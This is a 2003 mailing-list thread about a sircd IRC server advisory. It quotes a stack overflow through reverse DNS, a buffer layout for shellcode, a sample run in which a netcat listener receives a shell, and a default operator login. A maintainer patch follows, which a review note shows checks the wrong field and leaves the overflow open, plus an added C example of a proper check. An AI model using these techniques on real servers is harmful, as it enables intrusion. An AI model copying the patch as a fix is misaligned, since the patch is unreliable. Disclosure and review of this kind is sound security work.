Date: Tue, 04 Feb 2003 10:35:08 +0000
From: Zarjazz <zarjazz@barrysworld.com>
To: Knud Erik Højgaard <kain@ircop.dk>
Cc: ports@freebsd.org
Subject: Re: sircd buffer overflow
Message-ID: <3E3F975C.9070109@barrysworld.com>
In-Reply-To: <002901c2cbd0$1ded9220$24029dd9@tuborg>
References: <002901c2cbd0$1ded9220$24029dd9@tuborg>
Thanks for the info but I'd like to say that the BSD ports version of sircd is / was nothing to do with me and v0.4.0 was the initial alpha release and is now more than 1 year old compared to the current CVS tree so someone has not been keeping the source up to date!

> II. DESCRIPTION
>
> a: Insufficient bounds checking leads to execution of arbitrary code.

Patch attached to sanity check the dns lookup however I see this more as a bug than an exploit as you need root access on the system before you actually edit /etc/hosts in the first place. I would be interested to know if the current CVS version is affected in the same way as a lot has changed since the 0.4.x tree.

> b: Default oper account matching *!*@*

In all my releases I only ever included an example.conf file under docs/ so I can't take the blame for anyone running a server with an unaltered config file :)

Zarjazz

Knud Erik Højgaard wrote:
> A heads up..
>
> ------------------------------------------------------------------------
>
> I. BACKGROUND
>
> According to the vendor "The 'sircd' project started as an idea from
> the QuakeNet IRC Network coding team to develop a completely new irc
> server that had none of the problems of the original ircd, such as
> instability, scalability issues, redundant, badly written code and
> other nasty things."
> More info is available at http://www.sircd.org.
>
> II. DESCRIPTION
>
> a: Insufficient bounds checking leads to execution of arbitrary code.
> b: Default oper account matching *!*@*
>
> III. ANALYSIS
>
> a:
> Upon checking the reverse dns of a connecting user, if the returned
> value is longer than a certain length a classic stack overflow occurs.
>
> The buffer may be constructed as such:
> [94 bytes of crap][EBP ][EIP ][400 bytes for nops and shellcode],
> leaving us with plenty of space both before and after eip to store our
> shellcode.
>
> The accompanying .sh script is a silly proof of concept.
> Below is a fabricated copy of a typical run:
>
> [shell 1]
> $ nc -l -v -p 10000
> listening on [any] 10000 ...
>
> [shell 2]
> # ./sircd.sh 127.0.0.1
>
> sircd 0.4.0 proof-of-concept, usage ./sircd.sh <ip-of-attacker>
>
> UID check passed, backing up /etc/hosts
> Now connect to the sircd from 127.0.0.1
> Press a key and enter to restore /etc/hosts
> asd
> Game over man, game over
> #
>
> [shell 3]
> $ sircd &
> [1] 75711
> $
>
> =====================================
> sircd: v0.4.0 Alpha
> Author(s)
> Zarjazz (zarjazz@barrysworld.com)
> =====================================
> sircd initialized
> SSL initialized
>
> $ BitchX 127.0.0.1
> [snip some bitchx output]
> [fi] *** Welcome to the_server
> [fi] *** Resolving IP 127.0.0.1
> --from here on the connection freezes.
>
> [shell 2]
> fah
> Game over man, game over
> #
>
> [shell 1]
> connect to [127.0.0.1] from [garbage snipped] [127.0.0.1] 1869
> id
> uid=1001(sircd-user) gid=1001(sircd-user) groups=1001(sircd-user)
>
> b: type /oper bod bod bod in a connected irc-client.
>
> IV. DETECTION
>
> sircd-0.4.0 shipping with FreeBSD ports as well as from www.sircd.org
> as per 03/02-03 is found to be vulnerable.
>
> V. WORKAROUND
>
> unknown
>
> VI. VENDOR FIX
>
> unknown
>
> VII. CVE INFORMATION
>
> unknown
>
> VIII. DISCLOSURE TIMELINE
>
> 03/02-02 zarjazz@barrysworld.com,ports@freebsd.org notified.
>
> IX. CREDIT
>
> Knud Erik Højgaard

[attachment: sircd.patch]

diff -rubBN sircd-0.4.0/sircd/src/ircd_callbacks.c sircd-0.4.0.fix/sircd/src/ircd_callbacks.c
--- sircd-0.4.0/sircd/src/ircd_callbacks.c Sat Feb 2 17:44:49 2002
+++ sircd-0.4.0.fix/sircd/src/ircd_callbacks.c Tue Feb 4 10:12:37 2003
@@ -314,7 +314,7 @@
 {
 /* not cached, so do a dns lookup of the ip address */
 struct hostent *host_ent = gethostbyaddr((char * ) &addr.sin_addr, sizeof(addr.sin_addr), AF_INET);
-if (host_ent)
+if (host_ent && host_ent->h_length < HOSTLEN)
 ip_tree->left = (void *) str_dup(host_ent->h_name);
 else
 ip_tree->left = (void *) str_dup(cl_ip);
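Review bot: the `+` line in the hunk tests the wrong field. `h_length` is the size in bytes of each entry in `h_addr_list` (4 for AF_INET), not the length of `h_name`, so `host_ent->h_length < HOSTLEN` holds for every IPv4 lookup and the returned name is still unbounded when `str_dup(host_ent->h_name)` is stored and later copied. Compare the name itself, e.g. `if (host_ent && host_ent->h_name && strlen(host_ent->h_name) < HOSTLEN)`, and make the eventual copy into the fixed-size host buffer length-limited (strlcpy/snprintf) so safety does not hinge on this one call site; the `else` fallback to `cl_ip` is a sensible degradation for an over-long name.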
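As an added example that is not part of this thread or the sircd sources: a small C program contrasting the patch's `h_length` test with a check on the name string itself and a length-limited store, using a constructed over-long hostent so no DNS query is made. HOSTLEN is an assumed value and all function names are hypothetical.

```c
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>

#define HOSTLEN 63   /* assumed; sircd defines its own limit */

/* The condition used by the posted patch. h_length is the byte size of each
 * address in h_addr_list (4 for AF_INET), so it says nothing about h_name. */
int accept_by_h_length(const struct hostent *he)
{
    return he != NULL && he->h_length < HOSTLEN;
}

/* A check on the string that is actually going to be stored. */
int accept_by_name_length(const struct hostent *he)
{
    return he != NULL && he->h_name != NULL && strlen(he->h_name) < HOSTLEN;
}

/* Store the resolved name in a fixed-size buffer, falling back to the
 * textual IP when the lookup failed or the name would not fit.
 * Returns 1 if the resolved name was used, 0 if the fallback was used. */
int store_hostname(char *dst, size_t dstlen, const struct hostent *he,
                   const char *fallback_ip)
{
    int used_name = accept_by_name_length(he) && strlen(he->h_name) < dstlen;
    const char *src = used_name ? he->h_name : fallback_ip;
    size_t n = strlen(src) < dstlen ? strlen(src) : dstlen - 1; /* clamp fallback too */
    memcpy(dst, src, n);
    dst[n] = '\0';
    return used_name;
}

/* Constructed hostent with an over-long name (static arrays are zero-filled). */
static char long_name[HOSTLEN + 40];
static struct in_addr demo_addr;
static char *demo_addrs[] = { (char *)&demo_addr, NULL };
char demo_buf[HOSTLEN + 1];

const struct hostent *constructed_long_hostent(void)
{
    static struct hostent he;
    memset(long_name, 'a', sizeof(long_name) - 1);   /* 102 chars, NUL kept */
    he.h_name = long_name;
    he.h_addrtype = AF_INET;
    he.h_length = (int)sizeof(demo_addr);   /* 4: the address size, not the name */
    he.h_addr_list = demo_addrs;
    return &he;
}
```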